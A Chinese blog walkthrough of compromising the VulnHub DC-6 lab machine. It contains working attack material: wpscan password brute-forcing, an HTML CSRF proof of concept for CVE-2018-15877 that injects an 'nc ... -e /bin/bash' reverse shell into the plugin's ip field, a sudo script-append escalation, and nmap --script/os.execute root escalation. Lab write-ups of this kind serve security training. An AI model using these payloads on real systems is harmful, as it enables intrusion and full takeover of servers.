VulnHub仿真靶机渗透之DC-6 【DC系列】

DC系列靶机
仿真靶机渗透
发布日期:   2022-03-15

这次渗透是DC系列(VulnHub的仿真靶机)的DC-6,包含了wordpress后台插件命令注入拿shell、nmap高版本提权获取root等知识。

VulnHub靶机渗透之DC-6 【DC系列】

dc6靶机下载链接:https://www.vulnhub.com/entry/dc-6,315/

运行系统:kali+ dc-6

平台:vmware workstation

网络:均使用nat

任务:拿到root权限,找到flag

发现主机->192.168.124.136

arp-scan -l

1647260060211

对靶机进行nmap完整扫描->22、80 端口开放 linux的os

1647260150395

访问80端口,但是访问不了

1647260349934

因为做了域名绑定,所以需要我们在本地做个域名映射,这个和之前DC-2是一样的问题,要修改hosts文件。

windows

C:\Windows\System32\drivers\etc\hosts

kali

/etc/hosts

在末尾加入

192.168.124.136   wordy

1647260392674

1647260566055

1647260507674

指纹识别-wordpress

web站点访问成功

1647260640209

cms是wordpress,默认后台 http://wordy/wp-admin/

wpscan 枚举用户,暴力破解密码

使用wordpress专用的工具wpscan进行扫描

先枚举可能存在的用户。

wpscan  --url  http://wordy/ -e u

1647260841446

1647260864227

用户名

admin mark graham sarah jens

在官网下载的时候有暗示:可以减少我们爆破密码的时间

1647261065739

但是我kali可能删过东西,这个没有,我在网上搜了一下,通过这个线索,可以获得一个密码字典。

1647261238489

1647261347495

创建两个文件,一个usernames.txt ,一个passwords.txt

1647261454806

1647261496328

wpscan –url http://wordy –U username.txt –P passwords.txt

1647261478802

mark / helpdesk01

登录成功

1647261694497

activity monitor 插件漏洞利用 -利用csrf漏洞反弹shell

查看了一番,看到插件Activity。一般像word press这样成熟的cms漏洞多数在插件和主题中,所有我们要特别关注插件和主题。

看到 activity monitor插件,简单搜索了一下,发现这个插件是可以被利用。

1647261952043

1647262532827

发现这个插件有命令执行漏洞(CVE -2018-

15877)

复制到本地, 是CSRF漏洞

<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list

Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.

References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

PoC:
-->

<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

poc需要修改两处

1647263337406

1647263351908

<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc  192.168.124.134 1234 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1647262817541

kali里面访问该html文件,尝试获取反向shell,但是失败了,发现不能够成功反弹出shell。

1647262999467

1647263276236

原本以为这个poc没利用成功,纠结了蛮久的,但是后来换了个端口成功了。

换成6666端口了。

<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc  192.168.124.134 6666 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1647313482991

1647313426470

使用python进入交互的shell

python -c 'import pty;pty.spawn("/bin/bash")'

1647313688897

1647313651713

tail -10 /etc/passwd  
# 发现有几个用户在/home目录下

切换到/home目录下,发现有4个用户

graham jens mark sarah

1647313942015

1647313860024

graham / GSo7isUM1D4

添加了一个用户graham 口令为 GSo7isUM1D4 ,因为系统开放了22端口,此时可以通过ssh登录该用户。

graham用户ssh登录

ssh成功登录

ssh graham@192.168.124.136
# ssh登录graham
sudo -l   
# 查看权限【可以执行的操作】

1647314079705

sudo -l 查看可执行的操作。发现能够以jens用户,不使用口令执行情况下执行backups.sh。

看了一下backups.sh为一个文件解压的命令行

1647320810655

在解压指令后添加/bin/bash ,然后以jens用户去执行操作【当执行时可以获得jens的shell】。

echo '/bin/bash'  >> backups.sh
# 在 backups.sh 末尾增加/bin/bash

1647314760130

sudo -u jens /home/jens/backups.sh

执行成功

1647323552143

nmap提权

发现可以无需root密码执行nmap

16473228168741647322844908

较旧版本的 Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。新版本去除了交互模式,利用代码执行来获取到root权限

1647322954940

靶机里面nmap的版本是7.40,所以不能interactive 交互模式提权,所以用自定义script脚本提权,而nmap可以执行它自己的脚本文件,后缀为.nse

nmap 2.02 to 5.21版本提权

# 进入nmap的交互模式
nmap --interactive
# 执行sh,提权成功
nmap> !sh

nmap 5.21之后版本提权,下面两种方法其实都是一样的,一定要注意运行script的时候加上sudo,不然会提权失败。

way1:
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

way2:
echo 'os.execute("/bin/bash")' > root.nse
sudo nmap --script=/home/jens/root.nse

1647324105515

1647323970671

总结:

wpsacn爆破网站用户密码
wordpress后台Activity monitor插件命令注入获取shell
nmap高版本提权获取root

参考链接:

https://gtfobins.github.io/gtfobins/nmap/ 【gtfobins的nmap提权】

VulnHub-DC:6 【大余安全

https://www.cnblogs.com/SecIN/p/15504606.html 【dc1-7通关手册】

https://xz.aliyun.com/t/7258 【谈一谈Linux与suid提权】

靶场攻略 | DC6 (vulnhub) 【betasec

Vulnhub 靶机实战系列:DC -6 【雷神众测

文章作者: highgerms
文章链接: http://highgerms.github.io/2022/03/15/dc-6/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 highgerms !
DC系列靶机
 上一篇
VulnHub仿真靶机渗透之DC-7 【DC系列】 VulnHub仿真靶机渗透之DC-7 【DC系列】
这次渗透是DC系列(VulnHub的仿真靶机)的DC-7,包含了Drupal利用drush重置网站管理员密码、一句话木马Getshell、定时任务提权等知识。
2022-03-15 仿真靶机渗透
DC系列靶机
下一篇 
VulnHub仿真靶机渗透之DC-5 【DC系列】 VulnHub仿真靶机渗透之DC-5 【DC系列】
这次渗透是DC系列(VulnHub的仿真靶机)的DC-5,包含了日志文件getshell、suid提权-screen 4.5.0等知识。
2022-03-14 仿真靶机渗透
DC系列靶机
  目录